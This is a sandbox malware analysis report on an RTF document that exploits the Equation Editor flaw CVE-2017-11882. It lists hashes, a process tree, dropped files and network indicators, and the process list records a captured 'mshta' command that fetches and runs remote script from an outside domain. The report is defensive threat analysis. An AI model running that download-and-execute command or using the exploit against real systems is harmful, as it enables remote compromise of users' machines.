analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

f45dafd3e0a08a243eab4202c3797140.rtf

Full analysis: https://app.any.run/tasks/63ac6d09-8e23-4b6e-9db8-19cb2a779701
Verdict: Malicious activity
Analysis date: May 24, 2019, 02:56:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
exploit
CVE-2017-11882
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, ANSI
MD5:

F45DAFD3E0A08A243EAB4202C3797140

SHA1:

1177E06DD5392DA2BD3AA8CEB8368CAE35FE967D

SHA256:

F8C7F9AE9D4470CB4F495D0BACA4E5D928AC50816412D7E3A71AC5DECB2C0241

SSDEEP:

48:Mp54iWuutGfEjNMtvbDSj3xMa27983O+G+phyD9LhQQQzQUAUxNhHb11gb90RCZZ:MwuUG5VoWx2YKyRFVS1E9fNDHy4h/1N/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2872)
  • SUSPICIOUS

    • Executed via COM

      • EQNEDT32.EXE (PID: 2872)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EQNEDT32.EXE (PID: 2872)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3324)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3324)
    • Application was crashed

      • EQNEDT32.EXE (PID: 2872)
    • Reads internet explorer settings

      • mshta.exe (PID: 896)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe mshta.exe

Process information

PID
CMD
Path
Indicators
Parent process
3324"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f45dafd3e0a08a243eab4202c3797140.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2872"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
896mshta http://wooyun.org/1.txtC:\Windows\system32\mshta.exe
EQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Total events
863
Read events
766
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
2
Unknown types
3

Dropped files

PID
Process
Filename
Type
3324WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRFA1C.tmp.cvr
MD5:
SHA256:
3324WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B4A3A7010D8FEA8F141CA79DBF1C0A7F
SHA256:1AE5A8F017BE4D661214AD5059D36CCC00CE7BC44428DA72655DCE7695B6AB06
896mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\notice[1].pngimage
MD5:B9A4DCD8C2F300CD737E55CA9AB811B6
SHA256:554E7D779EC74F1281809F73A32ACDDBA174F9C947ADC6EDCBBCB5B51AB21F8D
3324WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$5dafd3e0a08a243eab4202c3797140.rtfpgc
MD5:E54B28D6DBBF1E71F999DF2C0EE60C1D
SHA256:F1DAD4CF7CF3BEF518B468C9FD72123234B72D103BCB49ED8F1FA387A3C60EE6
896mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\1[1].htmhtml
MD5:E0ACFEB017FBB4DB7548014B98D08D88
SHA256:60EDC82849578DAC87A6CEFD62E1E34A208DFA6E677606AA1D785427073A299D
3324WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BDA9440.wmfwmf
MD5:975B76E8E77D57CC386AF977A08B1E31
SHA256:8D80E9B9B39CD00F3BFADB3B2538DC46845FE8D0E7854D5DD9C9C381150DEDAD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
896
mshta.exe
GET
200
162.243.9.231:80
http://wooyun.org/1.txt
US
html
218 b
unknown
896
mshta.exe
GET
200
162.243.9.231:80
http://www.wooyun.org/notice.png
US
image
37.8 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
896
mshta.exe
162.243.9.231:80
wooyun.org
Digital Ocean, Inc.
US
unknown

DNS requests

Domain
IP
Reputation
wooyun.org
  • 162.243.9.231
unknown
www.wooyun.org
  • 162.243.9.231
unknown

Threats

No threats detected
No debug info